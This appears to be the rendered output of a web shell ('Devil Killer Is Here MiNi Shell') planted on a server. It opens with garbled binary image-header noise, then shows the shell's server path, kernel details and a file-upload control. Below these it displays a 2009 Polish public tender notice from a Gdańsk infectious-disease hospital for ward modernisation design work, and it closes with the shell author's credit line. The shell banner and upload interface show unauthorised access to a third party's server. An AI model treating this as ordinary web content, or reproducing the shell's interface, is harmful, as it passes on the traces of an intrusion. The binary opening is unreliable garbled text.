JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090117/19725-N-2009.html

<p class="kh_header"><b>Gdańsk: Wykonanie opracowania dokumentacji projektowo-kosztorysowej  na modernizację  pomieszczeń dla Oddziału XI i SARS Pomorskiego Centrum Chorób Zakaźnych i Gruźlicy w Gdańsku, ul. M. Smoluchowskiego 18-Nr postępowania 2/E/P/2009</b><br>
<b>Numer ogłoszenia: 19725 - 2009; data zamieszczenia: 17.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorskie Centrum Chorób Zakaźnych i Gruźlicy , ul. Smoluchowskiego 18, 80-214 Gdańsk, woj. pomorskie, tel. 058 3444440, faks 058 3444440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcchz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowania dokumentacji projektowo-kosztorysowej  na modernizację  pomieszczeń dla Oddziału XI i SARS Pomorskiego Centrum Chorób Zakaźnych i Gruźlicy w Gdańsku, ul. M. Smoluchowskiego 18-Nr postępowania 2/E/P/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie opracowania dokumentacji projektowo-kosztorysowej na remont i modernizację pomieszczeń dawnego Oddziału I zlokalizowanego na poziomie parteru budynku głównego C dla Oddziału XI Obserwacyjno - Zakaźnego i SARS w Pomorskim Centrum Chorób Zakaźnych i Gruźlicy w Gdańsku, przy ul. Smoluchowskiego 18 wraz z przeniesieniem do jego obszaru, Boksów Meltzera z budynku E.
2. Zakres prac do dokumentacji winien obejmować wykonanie następujących opracowań:
2.1. Wykonanie inwentaryzacji dla celów projektowych w tym ewentualne pozyskanie aktualnych map ewidencji (również w wersji cyfrowej) i wypis z rejestru gruntów,
2.2.  Opracowanie technologii Oddziału XI i Boksów Meltzera; 
-projekt technologiczny z przedstawieniem rozwiązań funkcjonalno-przestrzennych i wyposażeniem,
-bilans powierzchni remontowanych, modernizowanych i nowoprojektowanych,
-wykaz i wyliczenia kosztów wyposażenia oraz wskaźnikowe wyliczenie kosztu inwestycji (WKI),
2.3. Projekt budowlany z wykonaniem ewentualnych ekspertyz.
2.4. Wielobranżowy projekt wykonawczy w rozumieniu ustawy Prawo budowlane, spełniający wymagania rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003 r., nr 120, poz. 1133 z późn. zm.) oraz dokumentację niezbędną do przeprowadzenia procedury przetargowej i wyboru wykonawcy robót, zgodnie z ustawą Prawo zamówień publicznych, w tym rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. z 2004 r. Nr 130, poz.1389) oraz rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. Nr 202, poz. 2072 z późn. zm.), zawierający m.in.:
-budowę i przebudowę sieci, przyłączy i instalacji (woda zimna i ciepła, kanalizacja sanitarna i deszczowa, c.o., energetyczne, telekomunikacyjne, gazów medycznych, systemu sygnalizacji pożaru) w tym rozwiązanie kolizji z istniejącym uzbrojeniem oraz określeniem przewodów, osprzętu, przyborów i armatury,
-rozwiązania architektoniczne, konstrukcyjne, elewacja - rzuty, przekroje i widoki architektoniczne, projektów  elementów konstrukcyjnych i instalacji, opisy  do projektów robót wykończeniowych,
-inne projekty specjalistyczne np. aranżacja wnętrz, oznakowania administracyjne i ewakuacyjne i inne tablice informacyjne, wyposażenie w sprzęt dla osób niepełnosprawnych, 
-rozwiązania projektowe dla instalacji wentylacji grawitacyjnej, mechanicznej i klimatyzacyjnej w zakresie w jakim okażą się wymagane,
-komunikację wewnętrzną i zewnętrzną; zaprojektowanie dojazdów i miejsc postojowych, dojść dla pieszych oraz ich odwodnienie, organizację ruchu, oświetlenie zewnętrzne, 
-projekt zieleni i drobnych form architektonicznych, 
-raport o oddziaływaniu inwestycji na środowisko, jeżeli wynika to z  właściwych przepisów
-opinie, uzgodnienia i sprawdzenia rozwiązań projektowych w zakresie wynikającym z  przepisów,
-zestawienia  montowanych maszyn, urządzeń i wyposażenia z instrukcjami obsługi i eksploatacji obiektu, instalacji i urządzeń  związanych z obiektem,
-projekt organizacji robót.
3. Prace projektowe dla całości należy opracować z kompletem wszystkich wymaganych uzgodnień, a w szczególności z Inwestorem, służbami sanitarno-higienicznymi, p.poż., bhp i innymi, obejmujące co najmniej zakres:
-  projekt budowlany, 
-  projekty wykonawcze branżowe,
-  specyfikacje techniczne wykonania i odbioru robót,
-  przedmiary robót i kosztorysy inwestorskie.
4.  Zakres opracowań projektów instalacyjnych.
4.1. Nowe instalacje wewnętrzne;
- wentylacja mechaniczna nawiewno-wywiewna, 
- instalacja wodociągowa wody zimnej i ciepłej z cyrkulacją,
- instalacja kanalizacyjna - włączona do istniejących pionów kanalizacyjnych,
- instalacja centralnego ogrzewania,
- instalacja elektryczna nn., oświetlenia ogólnego, gniazd wtykowych, 
- instalacja sterowania wentylatorów,
- instalacja zasilania komputerów,
- instalacja sygnalizacji alarmowej- przeciwwłamaniowa,
- instalacja sygnalizacji alarmowej- przeciwpożarowa,
- instalacja komputerowa,
- instalacja telefoniczna,
- instalacja przyzywowa, audiowizualna.
4.2. Instalacje do przeniesienia z istniejących Boksów Meltzera z Pawilonu XI należy zdemontować i zainstalować w Oddziale I:
- instalację wentylacyjno-klimatyzacyjną,
- centrale i urządzenia z maszynowni wentylacyjnej,
- jednostki zasilające gazów medycznych i nadzoru kardiologicznego,
- instalację automatyki i sterowania,
- instalację kontroli dostępu,
- inne elementy instalacyjne i wyposażenia po ocenie i stwierdzeniu ich przydatności.
5.Opracowanie musi spełniać wymagania prawne dotyczące sposobu opracowania dokumentacji projektowej oraz projektowanych rozwiązań technologicznych i wykonawczych. 
6.Opracowanie wykonane powinno być z uwzględnieniem warunków zawartych w  rozporządzeniu Ministra Zdrowia z dnia 10 listopada 2006 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz.U. z 2006 r. nr 213, poz. 1568 z późn. zm.) oraz Prawie Budowlanym i aktami do niego wykonawczymi.
7.Założenia inwestorskie do zakresu przedmiotu opracowania projektowego objętego zamówieniem określa program funkcjonalno-użytkowy stanowiący załącznik nr 6 do Specyfikacji Istotnych Warunków Zamówienia.
8.Opracowania projektowe stanowią utwory w rozumieniu ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (tj. Dz. U. z 2006 r. Nr 90, poz. 631 z późn. zm.) i podlegają ochronie zawartej w jej przepisach.
9.Szczegółowy zakres opracowania obejmuje: 
9.1.Koncepcja programowo-przestrzenna z programem funkcjonalno-użytkowym z zestawieniem wyposażenia i programem robót WKI oraz organizacji robót - do uzgodnienia i akceptacji Zamawiającego i Państwowym Powiatowym Inspektorem Sanitarnym w Gdańsku [PPIS] - w liczbie 3 egzemplarzy;
9.2.Projekt budowlany (obejmujący wszystkie branże) wymagany przepisami Prawa budowlanego oraz projekt wykonawczy wraz z uzyskaniem wymaganych wszelkich uzgodnień i pozwoleń rozwiązań projektowych - w liczbie 5 egzemplarzy; 
9.3.Specyfikacje techniczne wykonania i odbioru robót budowlanych (Ogólna Specyfikacja Techniczna i Szczegółowe Specyfikacje Techniczne), przez które należy rozumieć opracowania zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości materiałów, wymagania dotyczące sposobu wykonania i  oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiarów - w liczbie 5 egzemplarzy; 
9.4.Przedmiary robót, przez które należy rozumieć opracowanie zawierające opis robót budowlach w kolejności technologicznej ich wykonania, z podaniem liczby jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych wraz z opracowaniem założeń wyjściowych do kosztorysowania robót, przez które należy rozumieć dane techniczne, technologiczne i organizacyjne, nieokreślone w dokumentacji projektowej oraz specyfikacji technicznej wykonania o odbioru robót budowlanych, a mające wpływ na wysokość wartości kosztorysowej robót budowlanych - w liczbie 5 egzemplarzy;
9.5.Kosztorys inwestorski, który należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389) - w liczbie 5 egzemplarzy;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-1, 74.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.03.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia może ubiegać się Wykonawca spełniający warunki wynikające z  Specyfikacji Istotnych Warunków Zamówienia oraz warunki wynikające  art. 22  ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz.U. z 2007 nr 223, poz.1655 z późn. zm.), tj. Wykonawca, który:
a)posiada wymagane przepisami uprawnienia niezbędne do wykonywania działalności lub   czynności określonych zakresem niniejszego zamówienia publicznego, 
b)posiada niezbędną wiedzę i doświadczenie, tj. zrealizował - tj. rozpoczął i zakończył  - usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia, tj. wykonał należycie w ciągu ostatnich 3 lat przed wszczęciem postępowania minimum 1 opracowanie projektowe o zbliżonym zakresie, jak będące przedmiotem niniejszego postępowania (projekt budowlano-wykonawczy o wartości brutto minimum 150.000,00 zł) oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia, tj. projektantami posiadającymi uprawnienia w zakresie branż projektowych odpowiadających przedmiotowi zamówienia (tj. architektonicznej bez ograniczeń, konstrukcyjno-budowlanej bez ograniczeń, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz specjalności telekomunikacyjnej, a także instalacyjnej w zakresie sieci i instalacji elektrycznych i elektroenergetycznych bez ograniczeń) lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)znajduje się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia, w tym posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości sumy ubezpieczenia minimum 150.000,00 zł,
d)nie podlega wykluczeniu w myśl postanowień art. 24 ust. 1 i 2 ustawy z 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz.U. z 2007 nr 223, poz.1655 z późn. zm).
2. Oceny spełnienia warunków Zamawiający przeprowadzi na podstawie złożonych przez Wykonawców oświadczeń i zobowiązań o spełnianiu tych warunków - zgodnie z załączonymi do SIWZ formularzami oświadczeń oraz w oparciu o wymagane w SIWZ dokumenty.
3.W przypadku braku wymaganych oświadczeń o spełnieniu warunków udziału w postępowaniu  lub dokumentów potwierdzających spełnienie tych warunków lub w przypadku złożenia oświadczeń lub dokumentów świadczących o braku spełnienia warunków Zamawiający wykluczy Wykonawcę z postępowania o udzielenie zamówienia, z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych.
4. Przy ocenie spełnienia warunków udziału, o których mowa w pkt.1. lit a) - c) przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunków będą zsumowane. Nie spełnienie powyższych wymagań spowoduje wykluczenie oferty podmiotów występujących wspólnie (konsorcjum). Doświadczenia podwykonawców oraz ich zasoby nie będą brane pod uwagę przy określaniu czy Wykonawca spełnia warunki udziału..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty Wykonawcy powinni złożyć następujące dokumenty w celu potwierdzenia spełniania warunków wymienionych w punkcie III.2.
1.1. oświadczenie, że Wykonawca spełnia warunki zawarte w SIWZ oraz nie podlega wykluczeniu zgodnie z art. 22 i 24 ustawy Prawo zamówień publicznych - załącznik Nr 2.
1.2. aktualny (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, podpisany przez osobę uprawnioną z adnotacją, że dane zawarte w danym rejestrze (ewidencji) nie uległy zmianie,
1.3. oświadczenie - wykaz wykonanych przez Wykonawcę, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o zamówienie usług - opracowań projektowych odpowiadających swoim rodzajem opracowaniu stanowiącym przedmiot zamówienia (projekt budowlano-wykonawczy o wartości brutto minimum 150.000,00 zł), a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że zostały wykonane należycie /np. referencje/ - wzór - Załącznik Nr 3, 
1.4. oświadczenie - wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności, zgodnie z Załącznikiem Nr 4 do SIWZ oraz pisemne zobowiązanie się innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w w/w wykazie, Wykonawca wskazał osoby, którymi będzie dysponował,
1.5. dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia w zakresie branż projektowych odpowiadających przedmiotowi zamówienia, tj. dokumenty uprawnień projektantów w zakresie występujących branż projektowych odpowiadających przedmiotowi zamówienia (tj. architektonicznej bez ograniczeń, konstrukcyjno-budowlanej bez ograniczeń, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, specjalności telekomunikacyjnej, a także instalacyjnej w zakresie sieci i instalacji elektrycznych i elektroenergetycznych bez ograniczeń) wraz z aktualnymi zaświadczeniami z właściwego oddziału Izby Samorządu Zawodowego potwierdzającymi przynależność do tej Izby,
1.6. polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1.2, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
4. Dokumenty, o których mowa w ust. 2 i ust. 3, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
2.WYMAGANIA DOTYCZĄCE OFERTY - WYKAZ WYMAGANYCH DOKUMENTÓW, OŚWIADCZEŃ, INFORMACJI I WYKAZÓW
1. Oferta winna zawierać:
1.1.Wypełniony formularz ofertowo-cenowy - przygotowany zgodnie z wzorem stanowiącym Załącznik nr 1 do SIWZ,
1.2.Oświadczenie, że Wykonawca spełnia warunki zawarte w SIWZ i nie podlega wykluczeniu zgodnie z art. 22 i 24 ustawy Prawo zamówień publicznych - Załącznik nr 2 do SIWZ,
1.3.Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu - wymienione w punkcie III.SIWZ,
1.4.Pełnomocnictwo dla osoby, której prawo do reprezentacji nie wynika z dokumentów określonych w punkcie III.1.2 (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej); pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu; treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony,
1.5.Dokument pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne wykonanie zamówienia w przypadku składania oferty wspólnej; pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu; treść pełnomocnictwa musi jednoznacznie określać czynności, do których pełnomocnik jest upoważniony..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pcchz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorskie Centrum Chorób Zakaźnych i Grużlicy w Gdańsku,ul.Smoluchowskiego 18,
80-214 Gdańsk, Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2009 godzina 11:00, miejsce: Pomorskie Centrum Chorób Zakaźnych i Grużlicy w Gdańsku,ul.Smoluchowskiego 18,
80-214 Gdańsk, Dział Zamówień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com